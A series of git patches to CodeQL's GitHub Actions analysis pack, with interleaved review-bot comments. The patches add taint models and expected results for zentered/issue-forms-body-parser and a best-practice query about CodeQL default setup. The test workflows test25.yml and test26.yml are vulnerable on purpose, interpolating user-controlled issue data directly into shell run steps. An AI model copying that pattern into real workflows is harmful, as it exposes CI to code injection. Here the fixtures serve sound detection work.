From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 13:38:17 +0100 Subject: [PATCH 655/707] models: add models for zentered/issue-forms-parser --- .../codeql/actions/dataflow/FlowSources.qll | 14 +++++++++ ql/lib/codeql/actions/dataflow/TaintSteps.qll | 21 ++++++++++++++ ...zentered_issue-forms-body-parser.model.yml | 6 ++++ .../CWE-094/.github/workflows/test25.yml | 13 +++++++++ .../CWE-094/.github/workflows/test26.yml | 29 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 20 +++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 16 ++++++++++ 7 files changed, 119 insertions(+) create mode 100644 ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index fa964f475cf7..2fca425642e7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -361,6 +361,20 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override Event getEvent() { result = this.asExpr().getATriggerEvent() } } +class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { + ZenteredIssueFormBodyParserSource() { + exists(UsesStep u | + u.getCallee() = "zentered/issue-forms-body-parser" and + not exists(u.getArgument("body")) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } +} + class OctokitRequestActionSource extends RemoteFlowSource { OctokitRequestActionSource() { exists(UsesStep u, string route | diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index 80858df909b6..56e2c75123c0 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll 
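Review bot: `ZenteredIssueFormBodyParserSource` has no QLDoc, and the reason it is a source only when the `body` argument is absent is not obvious from the code, since the explicit-body case is handled by a summary model (`input.body` to `output.data`) in a different file. A QLDoc on the class along the lines of `/** The outputs of zentered/issue-forms-body-parser when no explicit body is given: the action then presumably parses the body of the triggering issue, so its outputs are user-controlled. */` would record that, and a trailing comment on `not exists(u.getArgument("body"))` should point to `ext/manual/zentered_issue-forms-body-parser.model.yml` for the other case. The hunk ends inside `OctokitRequestActionSource`, which continues past it.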
+++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll
@@ -91,6 +91,25 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node
 )
 }
+/**
+ * A read of user-controlled field of the zentered/issue-forms-body-parser action.
+ */
+predicate zenteredIssueFormBodyParserSource(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(StepsExpression o |
+ pred instanceof ZenteredIssueFormBodyParserSource and
+ o.getTarget() = pred.asExpr() and
+ o.getStepId() = pred.asExpr().(UsesStep).getId() and
+ (
+ not o instanceof JsonReferenceExpression and
+ o.getFieldName() = "data"
+ or
+ o instanceof JsonReferenceExpression and
+ o.(JsonReferenceExpression).getInnerExpression().matches("%.data")
+ ) and
+ succ.asExpr() = o
+ )
+}
+
 
 /**
 * A read of user-controlled field of the octokit/request-action action.
 */
@@ -130,6 +149,8 @@ class TaintSteps extends AdditionalTaintStep {
 tjActionsChangedFilesTaintStep(node1, node2) or
 tjActionsVerifyChangedFilesTaintStep(node1, node2) or
 xt0rtedSlashCommandActionTaintStep(node1, node2) or
+ xt0rtedSlashCommandActionTaintStep(node1, node2) or
+ zenteredIssueFormBodyParserSource(node1, node2) or
 octokitRequestActionTaintStep(node1, node2)
 }
 }
diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml
new file mode 100644
index 000000000000..1a40a6341183
--- /dev/null
+++ b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSummaryModel
+ data:
+ - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"]
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml
new file mode 100644
index 000000000000..0bd666dc9485
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml
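Review bot: `zenteredIssueFormBodyParserSource` is registered as an additional taint step alongside `xt0rtedSlashCommandActionTaintStep` and `octokitRequestActionTaintStep`, yet its name says "Source"; renaming it `zenteredIssueFormBodyParserTaintStep` keeps the file's convention and avoids confusion with the `ZenteredIssueFormBodyParserSource` class it matches on. The QLDoc `A read of user-controlled field of the ...` also omits which field; `A read of the user-controlled data output of the zentered/issue-forms-body-parser action, plain or wrapped in fromJSON/toJSON.` says it. The `matches("%.data")` branch accepts any inner expression ending in `.data`, which is fine while `getStepId()` pins the step, but a short comment that this is intended (rather than an exact `steps.<id>.outputs.data` match) would help the next reader.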
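Review bot: The added line `+ xt0rtedSlashCommandActionTaintStep(node1, node2) or` duplicates the existing `xt0rtedSlashCommandActionTaintStep(node1, node2) or` directly above it and looks like a copy-paste leftover; it does not change the disjunction's result but should be dropped so that only `zenteredIssueFormBodyParserSource(node1, node2) or` is added. The enclosing `TaintSteps` class starts outside the hunk.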
@@ -0,0 +1,13 @@
+name: Issue Forms Body Parser
+
+on: issues
+
+jobs:
+ process:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Issue Forms Body Parser
+ id: parse
+ uses: zentered/issue-forms-body-parser@v2.0.0
+ - run: echo ${{ steps.parse.outputs.data }}
+ - run: echo ${{ toJSON(steps.parse.outputs.data) }}
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml
new file mode 100644
index 000000000000..8648d86983ee
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml
@@ -0,0 +1,29 @@
+name: Issue Forms Body Parser
+
+on:
+ workflow_dispatch:
+ inputs:
+ issue_number:
+ type: string
+ description: issue number
+ required: true
+env:
+ GH_TOKEN: ${{ github.token }}
+
+jobs:
+ process:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Fetch the issue
+ id: read_issue_body
+ run:
+ echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT
+
+ - name: Issue Forms Body Parser
+ id: parse
+ uses: zentered/issue-forms-body-parser@v2.0.0
+ with:
+ body: ${{ steps.read_issue_body.outputs.body }}
+
+ - run: echo ${{ steps.parse.outputs.data }}
+ - run: echo ${{ toJSON(steps.parse.outputs.data) }}
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index a3119c0fd75b..7722e6a21406 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
@@ -199,6 +199,13 @@ edges | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | 
provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -586,6 +593,15 @@ nodes | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 
[value] | 
@@ -764,6 +780,10 @@ subpaths | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | 
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 0af7aeb0958e..e60664795762 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -199,6 +199,13 @@ edges | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | 
provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -586,6 +593,15 @@ nodes | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 
[value] |
From 45b75470163844bba676e54b7ee138980f374bb3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 31 Oct 2024 13:38:38 +0100
Subject: [PATCH 656/707] chore: clean up partial.ql debug query
---
ql/src/Debug/partial.ql | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql
index c1578220b6be..cb8ba7873d8c 100644
--- a/ql/src/Debug/partial.ql
+++ b/ql/src/Debug/partial.ql
@@ -18,9 +18,7 @@ import PartialFlow::PartialPathGraph
private module MyConfig implements DataFlow::ConfigSig {
predicate isSource(DataFlow::Node source) {
source instanceof RemoteFlowSource and
- //source.getLocation().getFile().getBaseName() = "non-existant-test.yml"
- source.getLocation().getFile().getBaseName() = "test16.yml" and
- source.getLocation().getStartLine() = 125
+ source.getLocation().getFile().getBaseName() = "non-existant-test.yml"
}
predicate isSink(DataFlow::Node sink) { none() }
From c6048a6fa1d7bfb558b9b147aaf790b72248d81b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 31 Oct 2024 14:16:56 +0100
Subject: [PATCH 657/707] tests: Update tests
---
ql/test/library-tests/test.expected | 2 ++
1 file changed, 2 insertions(+)
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index 8d3e4193c69c..a8cf50334ce4 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
@@ -1559,6 +1559,7 @@ sources | martinhaintz/ga-file-list | * | output.file_names | filename | manual | | martinhaintz/ga-file-list | * | output.files | filename | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | +| peter-murray/issue-forms-body-parser | * | output.payload | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | @@ -1703,6 +1704,7 @@ summaries | tmelliottjr/extract-regex-action | * | input.input | output.resultArray | taint | manual | | tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | | traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zentered/issue-forms-body-parser | * | input.body | output.data | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | needs | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | From 230b2ff4d8773354ffc16e82898ac99b605202bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 Oct 2024 14:17:44 +0100 Subject: [PATCH 658/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5f8abdce209..d087f03b1526 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.82 +version: 0.1.83 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c0f849e1f3e1..073ddf5b4577 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.82 +version: 0.1.83 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0b7de6e86aa32a07856e0992c005658497e85f28 Mon Sep 17 00:00:00 2001 From: Brandon Stewart <20469703+boveus@users.noreply.github.com> Date: Thu, 31 Oct 2024 15:28:55 +0000 Subject: [PATCH 659/707] add rule to detect if default setup would be more appropriate --- ...efaultableCodeQLInitiatlizeActionQuery.qll | 36 ++++++++++ .../CodeQL/UnnecessaryUseOfAdvancedConfig.ql | 15 ++++ .../workflows/defaultable_workflow.yml | 70 +++++++++++++++++++ .../should_be_using_advanced_setup.yml | 41 +++++++++++ .../UnnecessaryUseOfAdvancedConfig.actual | 1 + .../UnnecessaryUseOfAdvancedConfig.expected | 1 + .../UnnecessaryUseOfAdvancedConfig.qlref | 1 + 7 files changed, 165 insertions(+) create mode 100644 ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll create mode 100644 ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref diff --git a/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll new file mode 100644 index 000000000000..ddec858aa62e --- /dev/null 
+++ b/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll
@@ -0,0 +1,36 @@
+private import actions
+
+/**
+ * Holds if workflow step uses the github/codeql-action/init action with no customizations.
+ * e.g.
+ * - name: Initialize
+ * uses: github/codeql-action/init@v2
+ * with:
+ * languages: ruby, javascript
+ *
+ */
+
+class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep {
+ DefaultableCodeQLInitiatlizeActionQuery() {
+ this.getCallee() = "github/codeql-action/init" and
+ not customizedWorkflowStep(this)
+ }
+}
+
+/**
+ * Holds if the with: part of the workflow step contains any arguments for with: other than "languages".
+ * e.g.
+ * - name: Initialize CodeQL
+ * uses: github/codeql-action/init@v3
+ * with:
+ * languages: ${{ matrix.language }}
+ * config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml
+ *
+ */
+
+predicate customizedWorkflowStep(UsesStep codeQLInitStep) {
+ exists(string arg |
+ exists(codeQLInitStep.getArgument(arg)) and
+ arg != "languages"
+ )
+}
\ No newline at end of file
diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
new file mode 100644
index 000000000000..c2259473b9cd
--- /dev/null
+++ b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
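Review bot: The QLDoc on `DefaultableCodeQLInitiatlizeActionQuery` is phrased as a predicate comment ("Holds if workflow step uses …") although it documents a class, and a blank line separates the closing `*/` from the `class` line, which may detach the comment from the declaration it is meant for. The convention in QL libraries is to describe the element and attach the comment directly, e.g. `/** A github/codeql-action/init step whose only with: input is languages, i.e. one that default setup could replace. */` immediately above the class; the same applies to the comment on `customizedWorkflowStep`. The class and file names carry a typo (`Initiatlize`), and the new directory is `Violations Of Best Practices` while the query and test directories added in this same commit use `Violations Of Best Practice`; both are cheaper to fix before the names spread to more files. The file also lacks a trailing newline.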
@@ -0,0 +1,15 @@
+/**
+ * @name Workflow Should Use Default Setup
+ * @description Workflows should use CodeQL Action with default setup instead of advanced configuration if there are no customizations
+ * @kind problem
+ * @problem.severity recommendation
+ * @precision high
+ * @id actions/unnecessary-use-of-advanced-config
+ * @tags actions
+ * maintainability
+ */
+
+import codeql.actions.Violations_Of_Best_Practices.DefaultableCodeQLInitiatlizeActionQuery
+
+from DefaultableCodeQLInitiatlizeActionQuery action
+select action, "CodeQL Action could use default setup instead of advanced configuration."
\ No newline at end of file
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
new file mode 100644
index 000000000000..31f43d8b8b29
--- /dev/null
+++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
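Review bot: `@precision high` is stronger than what the query checks: it reports every `github/codeql-action/init` step whose only `with:` input is `languages`, but customizations elsewhere in the job — such as a `category` on the analyze step (as in should_be_using_advanced_setup.yml, which is only excluded here because of its `config-file`) or manual build steps in place of `autobuild` — are not examined, so a workflow that genuinely needs advanced setup would still be reported when its init step is plain. Either lower it to `@precision medium` or extend `customizedWorkflowStep` to consider the analyze and build steps of the same job. The commit also adds `UnnecessaryUseOfAdvancedConfig.actual`, which is the test runner's output file; only the `.expected` file is normally committed.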
